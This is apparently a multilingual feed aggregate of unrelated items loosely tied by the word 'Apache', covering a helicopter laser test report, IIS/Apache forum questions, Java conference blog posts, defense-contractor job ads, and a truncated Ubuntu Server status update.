Într-un test de luptă finalizat cu succes de către armata americană, a fost folosit un laser de mare putere instalat pe un elicopter Apache AH-64, pentru a fi atacată o țintă (vehicul) fără conducător uman. Ținta respectivă s-a aflat la distanța de aproximativ o milă de aeronavă. A fost prima dată când un sistem laser complet integrat, aflat la bordul unei aeronave cu aripă rotativă (elicopter), a fost utilizat cu succes contra unei ținte, după cum a arătat compania Raytheon, cea care a fabricat noua armă laser. Laserul a fost testat la White Sands Missile Range, în New Mexico, lovind, cu o mare forță distructivă, o țintă situată la distanța de 1,4 kilometri. Noile arme laser, demne de filmele SF, sunt silențioase și greu detectabile de către inamic în timpul folosirii, motive pentru care există șanse sporite de a fi utilizate pe câmpul de luptă, în viitorul apropiat. Potrivit companiei producătoare, arma instalată pe elicopter poate fi utilizată într-o varietate largă de regimuri de zbor, altitudini și viteze de deplasare. Sistemele laser au fost instalate pe elicopterele Apache începând cu anul 1984, când au intrat pentru prima dată în exploatare. Erau dispozitive de putere redusă și se foloseau doar pentru dirijarea [...]
          Espacios web en IIS   

Espacios web en IIS

que tal, buen dia, espero y alguien me pudiera auxiliar con esta duda, se trata de que actualmente tengo un servidor apache en ubuntu server y un dns en windows server 2007 con el acceso por medio de un nombre, de igual manera tengo un servidor IIS funcionando en windows server 2007 con el que tambien le eh puesto un nombre desde el dns todo esta bien hasta aqui ya que me funcionan sin ningun problema, el inconveniente que tengo es que en el servidor de ubuntu puedo crear espacios web para los u...

Publicado el 16 de Octubre del 2016 por Loko

          Apariencia cuando llamo pagina asp desde mi IIS   

Apariencia cuando llamo pagina asp desde mi IIS

Buenas:

Tengo el siguiente problema: Tengo un servidor windows 2008 R2 Enterprise instalado el iis con todas las opciones por defecto y lo uso para mi intranet, cada vez que llamo a las paginas de aspx alojadas al usar el numero de ip del servidor "http://172.16.5.20:8080/Bitacora" (utilizo el puerto 8080 ya que el 80 esta reservado para apache) salen corectamente, es decir los estilos de botones, el renderizado, los slide de javascript, etc todo funciona correctamente, ...

Publicado el 03 de Julio del 2015 por David

          IIS PHP SQL   

IIS PHP SQL

Respuesta a IIS PHP SQL

xve: La verdad que cuando paraba wamp, paraba todo, sql incluido....., era logico pensar que deberia dejar funcionando sql o al menos activar sql; ahora mi problema es que no puedo hacer que IIS y SQL esten corriendo al mismo tiempo; si activo IIS no puedo activar SQL y viceversa; estoy pensando que SQL-WAMP no es el camino correcto para mi proposito, creo que deberia buscar otra alternativa para SQL algo asi como un SQL manager (independiente de PHP y APACHE) para IIS 7. Aunque esta opcion ya...

Publicado el 07 de Mayo del 2012 por Alejandro

          IIS PHP SQL   

IIS PHP SQL

Respuesta a IIS PHP SQL

Alejandro, interpreto que cada vez que dices que paras wamp (WAMP - DESACTIVADO), únicamente para el Apache, verdad? el MySQL sigue en funcionamiento, verdad?

Publicado el 07 de Mayo del 2012 por xve

          Guard Recycles Aircrafts - Package   
The last AH-64A Apache attack helicopter left the Missouri National Guard to be refurbished into a newer digital model in early 2012.
          Comentário sobre OA-X: painel do Senado dos EUA aprova US$ 1,2 bilhões para aquisição por Felipe Morais   
Eu torço para que o ST leve. Mas sendo racional, acho que dá Scorpion, sem dificuldades. Acho que o único ponto que tende para o ST, envolvendo aspectos técnicos, desempenho, politica, geração de empregos e tudo mais que envolve uma contratação desse tipo, é o preço de aquisição e operação. "Ah a tendência é diminuir custos". Sem dúvida. Mas vejo que essa tendência, tratando-se de EUA, é no sentido de não realizar operações que demandam um Super Tucano com F15 OU F22. Ou deslocar um Apache, enquanto um drone poderia facilmente realizar a missão e voltar para base sem sequer ser percebido. Agora, nesse caso, em que estão em disputa, uma ave genuinamente americana e outra produzida sob licença, em que o único aspecto que tende para essa segunda é o preço, nem sendo a diferença tão grande assim, acho muito difícil que em uma decisão racional dê ST.
          Service Unites! Annual Conference on Volunteerism   

Volunteer Tulsa presents….  The 7th Annual Conference on Volunteerism and Service November 7, 2014 8:30am-4:00pm Tulsa Community College, Northeast Campus 3727 East Apache Street Volunteer administrators, not-for-profit professionals, leaders in corporate social responsibility AND volunteers will come together to focus on uniting service. State Senator Rick Brinkley will share inspiring comments during the Conference opener, followed by a full day of workshops and celebrations. View the Registration Brochure for more details on expert faculty and sessions. Deadline for registering is October 31st.  Minimal fee required.  Register online @ http://www.volunteertulsa.org/special+events


          Controller:Struts   
This demonstration provides an overview of the Apache Struts page flow editor. The Struts page flow is opened by editing the struts-config.xml file directly or by using the open struts page flow context menu option on any project with the struts technology scope enabled. The page flow diagram provides a visual way of editing and documenting the page flow. Actions, page forward actions and data-bound pages are all represented as shapes on the diagram. Action forwards are shown as solid lines linking the action shapes. They’re labeled with the name of the forward. Explicit links between pages or between pages and actions are shown as dashed lines. Form-Bean usage is indicated by an overlay icon. The diagram provides several aids for visualizing and navigating around large page flows. The diagram also provides various tools to help with the layout of the flow. You can also customize colors and fonts and add notes to the diagram. The source view gives you access to the struts xml configuration file. The xml view is synchronized with the diagram view. You are able to edit the struts definition in either mode. The xml view provides code insight and syntax highlighting to reduce the chances of manual coding errors. Changes will also be validated against the struts DTD. Along with the diagram and xml views, the JDeveloper property inspector can be used to edit the struts metadata. Values can be directly edited in the property inspector which is also synchronized with the underlying xml. Lists of values are shown for properties such as the form-bean name or page names. You can also categorize the property list to make it simpler to locate the attributes you need to change. Finally, the structure pane provides an alternative view on the configuration’s structure and provides a useful way to navigate to the non-visual struts elements. You can also create new struts elements in the structure pane. Visual elements can be created directly in the diagram using the component palette. The diagram can be used as an application workbench, allowing drill-down into code or the visual page editor as appropriate for the node type. You can also create a form bean from here if needed. All the common super classes are listed for your convenience.
          Tiffany Fire -Socorro County – 6/29 7:15 p.m.   
The Tiffany Fire is 40% contained and estimated at 7,000 acres. The fire has burned into the Bosque del Apache and is threatening at least one railroad bridge.  No other structures are at risk at this time. Temperatures remain in the upper 90’s with relative humidity at 7%. The salt cedar will continue to create […]
          Java developer   
Java developer - Web development

With a minimum of 3 years of experience working in a software development role, the selected candidate is expected to have strong programming skills in Java (or similar) and be versed with object oriented design and development. He/she will also be expected to have a solid understanding of distributed concurrent systems and an understanding of service oriented architectures. Knowledge of systems level programming, databases and ORM and web delivery technologies such as Java Servlets will be considered an asset. You are expected to have a passion for programming and are willing to learn new technologies and techniques. You take pride in delivering elegant solutions, strive for excellence yet are capable of maintaining strict deadlines. You enjoy working in a team of like-minded individuals but can be trusted to work independently when this is required.
 
Key Job Responsibilities:
·       Conducts research and technology exploration as required to address any present or future projects.
·       Participates in analysis and design activities so as to produce a viable system design that fits within the overall system architecture whilst addressing all the elicited requirements.
·       Follows established development and testing procedures so as to ensure quality software development which meets the requirements whilst adhering to the proposed design and any stipulated timelines.
·       Creates and maintains documentation regarding systems being developed in order to ensure long-term maintainability.
·       Makes use of company standard source control and defect/task tracking software so as to effectively handle configuration management and defect fixing issues.
 
Skills Required:
·       Possess a university degree in computer science or engineering or equivalent.
·       Knowledge of Java SE.
·       Previous work experience or knowledge of agile methodologies like Scrum or Kanban.
·       Knowledge of web technologies (HTML, Javascript, JQuery).
·       Experience with Java enterprise technologies such as the Spring Framework (core, MVC, integration, ORM), JMS (ActiveMQ), Hibernate ORM, Servlet Containers (Apache Tomcat).
·       Knowledge of databases (MySQL preferred), and NoSQL systems (MongoDB preferred).
·       Proficient with the use of Linux.
·       Experience with build automation tools (such a Maven), source control tools, and bug tracking software.
·       Experience with IDEs such as Eclipse.
·       Fluent in written and spoken English.
 

    Job type:
    Full-time
    Industry: Other

          Zanikowy, cuchnący, przewlekły nieżyt nosa (ozena) – przyczyny, objawy, leczenie    

Zanikowy, cuchnący, przewlekły nieżyt nosa (ozena) to schorzenie, które może być wywołane czynnikami, jak: kurz czy zanieczyszczenie powietrza. Ozena objawia się np.: zielonymi lub żółtymi strupami, brzydkim zapachem z nosa, przewlekłym katarem, pogorszeniem lub zanikiem węchu. Artrofia (zanik błony śluzowej nosa) przebiega etopowo. Zanikowy, przewlekły, cuchnący nieżyt leczy się m.in. poprzez nawilżanie i oczyszczanie jamy nosowej (woda morska).


          panel de control   

panel de control

Respuesta a Como desinstalar aplicación que no aparece en el panel de control

Hola xve, con el Ccleaner pude hacerlo. Pero para la instalacion del xampp 5.6.21 me da errores los cuales he posteado en el foro de apache.

Publicado el 11 de Junio del 2016 por zendi

          Mississippi Guardsmen Support Aerial Operation   
An aircrew from Company A, 1st Battalion, 149th Aviation Regiment, is in Gulfport, Mississippi performing maintenance on AH-64 Apache Helicopters to support the 155th Armored Brigade Combat Team by participating in missions at Camp Shelby, Mississippi for an Exportable Combat Training Capability exercise. Produced by Pfc. Dharron Collins. Additional Video by Sgt. Tim Morgan and Spc. Jovi Prevot. Interviews with Sgt. Casey D. Hopkins and Staff Sgt. Clayton L. Yielding. Also available in high definition.
          KANJAVA PARTY 2017を開催しました&発表資料まとめ #kanjava #KanJavaParty   

kanjava.connpass.com

私が代表を務めている関西Javaエンジニアの会(関ジャバ)の、過去最大規模のイベント"KANJAVA PARTY 2017"を開催し、無事終了することができました!

このイベントでは関ジャバでの初の取り組みがありました。

  • 初の複数トラック
  • 初の100人規模

企画時は100人集まるかどうか不安でしたが、募集開始数日で申し込みが100人を超えキャンセル待ちに。都合がつかなくなった人はキャンセルをお願いします、と連絡もしながら当日も100人超えで迎えました。

これだけの人数ですと、受付、懇親会準備などの作業量が大きくなり、不安もありました。私は座ってちょっと司会する程度でしたが、他の運営メンバーは自律的に動き裏方の作業を本当に実行していっていました。トラブルがなかったのはまさにこの理由だと考えます。

懇親会もほぼキャンセルなく参加するみなさんが会費を出してくださり、逆に想定人数に対しては多めの量だったピザがすぐになくなるなどうれしい悲鳴もありました。

関わってくださったすべての人に感謝を申し上げます。

今回は運営でTシャツを作ってみました!

セッション資料(公開確認次第更新します)

前説 『関ジャバとJava』 関西Javaエンジニアの会 会長 じゅくちょー(@jyukutyo)

私の開会の前説資料です。連絡事項等のスライドは削除したものです。関ジャバの歴史、KANJAVA PARTYの狙いについて話しました。

KANJAVA PARTY 2017 前説 from Koichi Sakata
www.slideshare.net

B1 「Spring Security にできること・できないこと」 opengl_8080さん

qiita.com

A2 「普段使いのDDD」 haljikさん

speakerdeck.com

B2 「JUnit5の味見」山根英次さん

speakerdeck.com

A3 「Introduction to JShell: Official REPL Tool for Java Platform」吉田真也(@shinyafox)さん

Java Day Tokyo 2017と同じセッション内容のため、その際の資料です。

Introduction to JShell #JavaDayTokyo #jdt_jshell from bitter_fox
www.slideshare.net

B3 「ストリーム処理ことはじめ ~ Akka Streams と RxJava」 にしかわささきさん

speakerdeck.com

A4 「Kafkaを使ってイベントを中心にしたアプリケーションを作ってみる。Spring Cloudにのせて。」  椎葉 光行(@bufferings)さん

bufferings.hatenablog.com

B4 「Microservicesアーキテクチャに取り組んでみえたこと」 藤井善隆さん

speakerdeck.com

A5 「DevLOVE関西からギルドワークスへの越境(仮)」 中村 洋(@yohhatu)さん

speakerdeck.com

B5 「関西Java女子部ショートセッション大会」 関西Java女子部(Abe Asami (きの子) 他3名)

speakerdeck.com

A6 『オフショア開発にも応用可能!? リモートチームの道具箱』 粕谷大輔(@daiksy)さん

speakerdeck.com

B6 『はてなブックマークAndroidアプリへのKotlinの導入について』 西林 拓志 (takuji31)さん

speakerdeck.com

LT

JDK9の真の目玉機能はこれだ! from Hiroyuki Ohnaka
www.slideshare.net

docs.google.com

speakerdeck.com

speakerdeck.com


          JJUG CCC 2017 Spring 参加&スポンサーセッション登壇 #jjug_ccc   

スポンサーセッション

今まで3回CCCではセッションをCfPを出して担当しました。私が所属するフリュー株式会社は、前回2016 Fallからスポンサーになっています。今回は僕がスポンサーセッションを担当しました。

ですが、スポンサーだからといって何を宣伝するわけでもなく、純粋な意味でCCCにふさわしいセッションをすることを心がけました。

スライドはこちらです。

JJUG CCC 2017 Spring Seasar2からSpringへ移行した俺たちのアプリケーションがマイクロサービスアーキテクチャへ歩み始めた from Koichi Sakata
www.slideshare.net

悪いセッションではなかったようで、よかったです。

f:id:jyukutyo:20170523154733p:plain

参加セッション

  • JHipsterで学ぶ!Springによるサーバサイド開発手法
  • Java Clientで入門するApache Kafka
  • データ履歴管理のためのテンポラルデータモデルとReladomoの紹介
  • Polyglot on the JVM with Graal
  • Seasar2からSpringへ移行した俺たちのアプリケーションがマイクロサービスアーキテクチャへ歩み始めた(スピーカー)
  • (自分のセッションが終わったので脱力)
  • ハックで生きる:オープンソースで会社を興すには

JHipsterもReladomoも気になりましたね!Kafkaはアーキテクチャ内にはあるのですが、僕は全然詳しくなくてここで初歩を学べてよかったです。DevoxxUSでKafkaのセッション出て何かよくわかっていなかったので。

“ハックで生きる"はfather of Jenkinsである川口さんのセッションです。川口さんのセッションは何度か聴いていますが、いつもこうウィットに富んだトークで楽しいです。会社を興すという点では僕に直接的に何かあるわけではないですが、川口さんの話を日本(語)で聴けることが貴重です。

Polyglot on the JVM with Graal

最近Graalと聞けば飛びついています。Graal自体に知的好奇心が刺激されているのに加えて、まずは簡易なオレオレJVM言語を作りたくて、それにGraalとTruffle、ANTLRを使おうと考えています。vJUGのOlegさんがこれをやっているので、自分でもやってみたいと。あ、これ次回CCCのネタにできるな。

大規模カンファレンスとしてのJJUG CCC

まずは幹事、ボランティアのみなさん、お疲れさまでした&ありがとうございました!僕も小さいながらコミュニティを運営する身、参加者が当日1,000人を超えるイベントの運営は想像を絶します。海外Javaエンジニアから聞きましたが、1,000人規模のボランティアベースのイベントなど存在しないそうです。

とは言え年次総会でJJUG会長がおっしゃっていたように、運営のみなさんも限界の規模…自分が何をできるか?運営に回って好きなセッション見られなくなるのも本音だとちょっとつらい…今までどおりスピーカーを担当することは続けられるけれど、これは運営の何かを負担することではないですからね…もちろん、参加費や寄付ができるなら喜んで出します。あまり大きなことは言えませんが、1,2万円くらいなら…ひとまず次回は今回と同じベルサール新宿グランドということで、少なくとも運営を妨げないよう、協力姿勢を取り続けていきたいです。


          Aircraft Powertrain Repairer, Long Version   
1st CAB Aircraft Powertrain Repairer conducts Fluorescent Penetrant and 50 Hour Borescope Inspections on U.S. Army AH-64D Apache helicopter.
          Apache Mechanic - Package, Long Version   
The 4th Combat Aviation Brigade Apache Unit has saved hundreds of lives during the Units deployment so far. People often focus on the pilots who accomplish these missions, but it is the mechanics that keep the birds running smoothly. Air Force Sgt. Joshua Peargin takes us to Mazar-E-Sharif where one mechanic tells us about the impact that they have made so far. Also available in high definition
          PHP Developer - TORRA INTERNATIONAL - Malappuram, Kerala   
Maintain and manage general network setup. Configure and maintain Apache and PHP Programming atmosphere.... ₹15,000 a month
From Indeed - Tue, 04 Apr 2017 03:57:40 GMT - View all Malappuram, Kerala jobs
          Comment on ProxyPass Exclude Directory/Path under Apache by Gagan   
It works with directories as well. The placement of the ignore rule is the key. You need to mention the path and files which are to be ignored before the actual ProxyPass happens.
          Comment on ProxyPass Exclude Directory/Path under Apache by asdf   
Doesn't work with directories, only files.
          (USA-AZ-Fort Huachuca) Web Systems Administrator   
**Web Systems Administrator** **Requisition ID: 17015332** **Location\(s\): United States\-Arizona\-Fort Huachuca** **US Citizenship Required for this Position: Yes** **Relocation Assistance: No relocation assistance available** **Travel: No** **Are you looking for a rewarding and challenging career as a Web Server Administrator with one of the nation's leading Defense Contractors? If so, then Northrop Grumman may be the employer for you\!** **Northrop Grumman is seeking a motivated professional to join our team\. This position is located at Fort Huachuca, AZ\.** **The Web Server Administrator Is the primary systems administrator for a software engineering shop that develops web applications in ASP\.NET C\# with MVC\. We are a primarily Microsoft Windows environment\. The web administrator will be the POC and manage the code and documentation of all web servers\. The candidate will also be the primary POC for establishing new FQDNs, verifying and testing certificates, maintaining Single Sign\-On, and maintaining/troubleshooting web applications as needed\.** Basic Qualifications: **1\. Must possess a Bachelor's degree and a minimum of 6 years of experience in Windows Administration; Note: Additional experience may be considered in lieu of the degree requirement\. \(Minimum of 10 years combined between education and relevant experience\) Additional experience can include programming\.** **2\. Must possess experience managing multiple web sites and applications, in a primarily Windows server environment\.** **3\. Must be experienced with Microsoft Server, IIS 7\.x/8\.x, MS SQL 2012 or higher\. Configuring new web applications in IIS, installation and maintenance of SSL certificates a plus\.** **4\. Must have familiarity with programming methodologies\.** **5\. Must have experience troubleshooting web applications and web servers\.** **6\. Must possess Security certification \(or higher\)\.** **7\. Must possess Windows operating system environment certification \(Server 2008 or Server 2012\), or able to achieve within 6 months from hire\.** **8\. Must possess/obtain a Top Secret with SCI eligibility: Note an Interim Secret is a minimum to start\.** **9\. Must have familiarity with at least one coding language\.** **10\. Must be a U\.S\. Citizen\.** Preferred Qualifications: **1\. Experience with Linux Red Hat web environments, running web applications on Apache/Tom Cat in addition to Windows administration\.** **2\. Familiarity with Site Minder and Single Sign\-On using AKO or EAMS\-A/GCDS** **3\. Familiarity with U\.S\. Army policies and procedures, STIGs, and IAVAs\.** **4\. Ability to debug web applications in C\#\.** **5\. Familiarity with object oriented programming\.** Northrop Grumman is committed to hiring and retaining a diverse workforce\. We are proud to be an Equal Opportunity/Affirmative Action Employer, making decisions without regard to race, color, religion, creed, sex, sexual orientation, gender identity, marital status, national origin, age, veteran status, disability, or any other protected class\. For our complete EEO/AA and Pay Transparency statement, please visit www\.northropgrumman\.com/EEO \. U\.S\. Citizenship is required for most positions\. **Title:** _Web Systems Administrator_ **Location:** _Arizona\-Fort Huachuca_ **Requisition ID:** _17015332_
          (USA-VA-Springfield) Cyber Architect 5   
**Cyber Architect 5** **Requisition ID: 17015298** **Location\(s\): United States\-Virginia\-Springfield** **US Citizenship Required for this Position: Yes** **Relocation Assistance: No relocation assistance available** **Travel: No** Where Technology and Teamwork come together\.\.\. Where will you find innovation and technology? Right here at Northrop Grumman Corporation\. Join us on the edge… The Cutting Edge\! Transforming the future of technology… Find balance with a part\-time opportunity\.\.\. Realize the rewards of conquering a new challenge\.\.\.Work with the technology you need to succeed\.\.\. Northrop Grumman is building our team supporting the data center infrastructure and middleware of U\.S\. Customs and Border Protection \(CBP\)\. CBP is one of the world's largest law enforcement organizations and is charged with keeping terrorists and their weapons out of the U\.S\. while facilitating lawful international travel and trade\. On an annual basis, CBP welcomes nearly one million visitors, screens more than 67,000 cargo containers, arrests more than 1,100 individuals, and seizes nearly 6 tons of illicit drugs\. Most team members will be located in Springfield, VA\. As a leader in information technology solutions Northrop Grumman provides talented individuals with the opportunity to: • Work with the latest tools and technologies • Share experiences, insights, perspectives, and creative solutions with some of the best minds in the industry\. • Connect with coworkers in a caring, diverse, and respectful environment • Collaborate through integrated product teams, cross\-functional teams, and employee resource groups\. Responsibilities include: Understand applications requirements, design and development working with Development Operations, S/W development, and S/W architecture, knowing how to antiquate industry & business requirements that drive operations\. The primary goal of Enterprise Web Services is to provide engineering and operational support for Middleware technologies \(e\.g\., XML, Web Services, MQ, DataPowers, and Service\-Oriented Architecture\), Web Services products \(e\.g\.,WebLogic, WebSphere, Apache Web Server, Tivoli Access Manager and WebSEAL\) and Enterprise Applications and Technical Projects based on customer requirements and mission needs while ensuring 24x7x365 O&M support for its CBP mission\-critical systems relating to MQ/Middleware Operations and Web Services Operations\. • Implements and resolve connectivity with trade partners and value added network \(VAN\) providers • Provide data translation/transformation maps and resolve data translation/transformation mapping problems • Track, maintain and continuously improve upon system availability, system security, performance and overall health of Enterprise Web Systems • Develop, operate and maintain a capacity and performance management process to plan, implement, and measure as well as manage the capacity of the services to confirm that the levels of capacity consistently meet business requirements and objectives\. • Design and support Web services produces on Oracle WebLogic Server, IBM WebSphere Application Server, and any other java container as designed by the customer\. • Engineer, monitor and maintain all functionality, certifications and supported standards available from the Web Service products\. Basic Qualifications: • Bachelor’s Degree in related field and 14 years of experience\. • Experience with Linux/UNIX/Windows operating systems\. • Must have an active DHS TS Clearance and be able to obtain a DHS/CBP security clearance \- US Citizenship required\. • Must possess experience of system engineering in one or more areas including telecommunications concepts, computer languages, operating systems, database/DBMS and middleware\. Preferred Qualifications: \- Experience with all components across the CBP Database enterprise architecture\. Northrop Grumman is committed to hiring and retaining a diverse workforce\. We are proud to be an Equal Opportunity/ Affirmative Action Employer, making decisions without regard to race, color, religion, creed, sex, sexual orientation, gender identity, marital status, national origin, age, veteran status, disability, or any other protected class\. For our complete EEO/ AA and Pay Transparency statement, please visit www\.northropgrumman\.com/EEO \. U\.S\. Citizenship is required for most positions\. **Title:** _Cyber Architect 5_ **Location:** _Virginia\-Springfield_ **Requisition ID:** _17015298_
          Ubuntu Insights: Ubuntu Server Development Summary – 30 Jun 2017   

Hello Ubuntu Server!

The purpose of this communication is to provide a status update and highlights for any interesting subjects from the Ubuntu Server Team. If you would like to reach the server team, you can find us at the #ubuntu-server channel on Freenode. Alternatively, you can sign up and use the Ubuntu Server Team mailing list.

cloud-init and curtin

cloud-init

  • Completed two SRU submissions this week:
    • Initial support for SR-IOV public preview instances on Azure
    • Fix apt-get race conditions at startup on AWS
  • Fix NTP integration tests on Artful

curtin

  • Completed SRU submission (LP: #1697545)

DPDK

  • New Debian upload
  • Guiding new contributors around backports and uploads into Debian & Ubuntu
  • Enhancements to uvtool for better arm64 testing
  • Prepping CI testing on 17.05.x branch

Ubuntu Server Test

The Ubuntu Server team’s Jenkins instance is managed using Jenkins Job Builder. All these scripts and other test tools are now located under the Canonical Server Team’s GitHub page.

Bug Work and Triage

IRC Meeting

Ubuntu Server Packages

  • First review of pcp main inclusion request (MIR)
  • Fix strongswan import due to top-level pristine-tar/dsc branches
  • Updated to server guide
    • Section on virtual functions and USB passthrough
    • Accessing qemu monitor via libvirt

Below is a summary of uploads to the development and supported releases. Current status of the Debian to Ubuntu merges is tracked on the Merge-o-Matic page. For a full list of recent merges with change logs please see the Ubuntu Server report.

Uploads to the Development Release (Artful)

cloud-init, 0.7.9-199-g4d9f24f5-0ubuntu1, smoser
cloud-init, 0.7.9-197-gebc9ecbc-0ubuntu1, smoser
exim4, 4.89-3ubuntu1, mdeslaur
freeipmi, 1.4.11-1.1ubuntu4, dannf
libcommons-cli-java, 1.4-1, None
libvirt, 2.5.0-3ubuntu10, corey.bryant
libyaml, 0.1.7-2ubuntu2, costamagnagianfranco
libyaml, 0.1.7-2ubuntu1, costamagnagianfranco
lxd, 2.15-0ubuntu3, stgraber
lxd, 2.15-0ubuntu2, stgraber
lxd, 2.15-0ubuntu